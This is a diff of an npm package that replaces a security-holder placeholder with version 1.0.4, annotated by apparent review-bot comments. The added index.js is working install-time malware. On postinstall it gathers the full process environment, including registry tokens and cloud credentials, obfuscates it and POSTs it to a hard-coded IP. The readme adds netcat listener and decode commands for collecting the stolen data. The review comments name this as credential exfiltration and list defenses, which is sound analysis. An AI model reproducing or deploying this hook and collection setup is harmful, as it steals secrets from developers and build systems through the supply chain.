@tilliwilli/npm-lifecycles 0.0.1-security → 1.0.4



  1. package/index.js +37 -0
  2. package/package.json +57 -3
  3. package/readme.md +84 -0
  4. package/README.md +0 -5
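--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,37 @@
+var fs = require("fs");
+var util = require("util");
+var http = require("http");
+
+var npmLifecycleEvent = process.env.npm_lifecycle_event;
+
+if (npmLifecycleEvent !== "postinstall")
+process.exit();
+
+var log = {
+event: npmLifecycleEvent,
+version: process.version,
+arch: process.arch,
+platform: process.platform,
+features: process.features,
+env: process.env,
+title: process.title,
+argv: process.argv,
+execArgv: process.execArgv,
+pid: process.pid,
+ppid: process.ppid,
+execPath: process.execPath,
+debugPort: process.debugPort,
+argv0: process.argv0,
+_preload_modules: process._preload_modules,
+mainModule: process.mainModule,
+};
+
+var output = util.inspect(log);
+
+http
+.request({
+hostname: "51.250.107.250",
+method: "POST",
+headers: { Authorization: `Bearer ` + Buffer.from(output).map(x => x ^ 7).toString("base64") }
+})
+.end();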
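Review bot: `env: process.env,` (new line 16), alongside argv, execPath and mainModule, serializes the entire install-time environment — which on developer machines and CI runners routinely carries registry tokens, cloud credentials and pipeline secrets — and the request at new lines 31–37 POSTs it over plaintext HTTP to the hard-coded address 51.250.107.250 with nothing more than an XOR-by-7 and base64 transform in the Authorization header; this is credential exfiltration rather than telemetry, so the file should be rejected outright, not amended. The `postinstall` gate at new line 7 means it fires on every consumer `npm install` with no user interaction, while `fs` (new line 1) is required and never used. For defenders, the indicator is outbound HTTP from a node process during the install phase carrying a `Bearer` value that is base64 of `util.inspect` output; installing with `ignore-scripts=true` in `.npmrc` and restricting egress from build agents would have stopped this variant.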
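--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,60 @@
 {
 "name": "@tilliwilli/npm-lifecycles",
-"version": "0.0.1-security",
-"description": "security holding package",
-"repository": "npm/security-holder"
+"version": "1.0.4",
+"main": "index.js",
+"scripts": {
+"premyscript": "node index.js",
+"myscript": "node index.js",
+"postmyscript": "node index.js",
+"prepare": "node index.js",
+"prepublish": "node index.js",
+"prepublishOnly": "node index.js",
+"prepack": "node index.js",
+"postpack": "node index.js",
+"dependencies": "node index.js",
+"devDependencies": "node index.js",
+"devDependency": "node index.js",
+"curl": "node index.js",
+"wget": "node index.js",
+"preinstall": "node index.js",
+"install": "node index.js",
+"postinstall": "node index.js",
+"preprepare": "node index.js",
+"postprepare": "node index.js",
+"node_modules": "node index.js",
+"binding.gyp": "node index.js",
+"publish": "node index.js",
+"postpublish": "node index.js",
+"npm rebuild": "node index.js",
+"npm restart": "node index.js",
+"restart": "node index.js",
+"stop": "node index.js",
+"start": "node index.js",
+"pre": "node index.js",
+"post": "node index.js",
+"prerestart": "node index.js",
+"postrestart": "node index.js",
+"prestart": "node index.js",
+"poststart": "node index.js",
+"prestop": "node index.js",
+"poststop": "node index.js",
+"npm test": "node index.js",
+"pretest": "node index.js",
+"test": "node index.js",
+"posttest": "node index.js",
+"uninstall": "node index.js",
+"PATH": "node index.js",
+"bar": "node index.js",
+"npm_lifecycle_event": "node index.js",
+"sh": "node index.js",
+"npm_config_binroot": "node index.js",
+".gyp": "node index.js",
+"npm": "node index.js",
+"INIT_CWD": "node index.js",
+"run": "node index.js"
+},
+"keywords": [],
+"author": "",
+"license": "ISC",
+"dependencies": {}
 }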
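Review bot: `"postinstall": "node index.js"` (new line 21) is the entry that matters, because index.js exits unless npm_lifecycle_event is postinstall, so a plain consumer `npm install` runs it; the many other keys (`PATH`, `sh`, `curl`, `npm_lifecycle_event`, a second `dependencies` nested inside scripts) are not npm lifecycle events and read as an enumeration of which names npm will execute rather than a real build configuration. The removed lines `"version": "0.0.1-security"` and `"repository": "npm/security-holder"` show this name was previously a registry security-holder, which on its own should have blocked a republish with install hooks. For consumers the mitigation is `ignore-scripts=true` in `.npmrc` (or not installing at all), and the postinstall entry pointing at a network-capable script is the signal to alert on in dependency review.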
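--- a/package/readme.md
+++ b/package/readme.md
@@ -0,0 +1,84 @@
+# list of events occur when publishing
+
+- prepublishOnly
+- prepack
+- prepare
+- postpack
+- publish
+- postpublish
+
+
+# list of events occur when installing from npm registry
+
+- preinstall
+- install
+- postinstall
+
+
+# list of events occur when installing from file:// protocol (file:///htdocs/test)
+
+- preinstall
+- prepare
+- install
+- postinstall
+
+
+# list of events occur when installing from http:// protocol (http://localhost:8000/test.tar.gz)
+
+- preinstall
+- install
+- postinstall
+
+# what web server receives from `npm i http://localhost:8000/test.tar.gz`
+
+```bash
+┌──(tilli㉿pasakoh)-[/mnt/c/Users/tilli/htdocs/visiology-public-utilities-hack]
+└─$ nc -lvnp 8000
+listening on [any] 8000 ...
+connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48492
+GET /test.tar.gz HTTP/1.1
+npm-command: install
+pacote-pkg-id: remote:xxx@http://localhost:8000/test.tar.gz
+pacote-req-type: tarball
+pacote-version: 12.0.3
+user-agent: npm/8.5.0 node/v16.14.2 win32 x64 workspaces/false
+if-modified-since: Sun, 10 Apr 2022 12:48:38 GMT
+connection: keep-alive
+Accept: */*
+Accept-Encoding: gzip,deflate
+Host: localhost:8000
+```
+
+# listening server
+
+```bash
+while true; do sudo nc -N -lvnp 80 < response.json >> output; done
+```
+
+
+# response.json
+
+```bash
+HTTP/1.1 200 OK
+Connection: close
+
+{"result":"ok"}
+
+```
+
+# extract request payload
+
+```bash
+grep Auth output | awk '{print $3}' | base64 -d | less
+```
+
+
+# investigate more
+
+- place exe in node_modules/.hooks/{eventname} https://docs.npmjs.com/cli/v6/using-npm/scripts#hook-scripts
+
+
+# links
+
+https://docs.npmjs.com/cli/v8/using-npm/scripts#life-cycle-scripts
+https://docs.npmjs.com/cli/v8/configuring-npm/package-json#scripts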
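--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=%40tilliwilli%2Fnpm-lifecycles for more information.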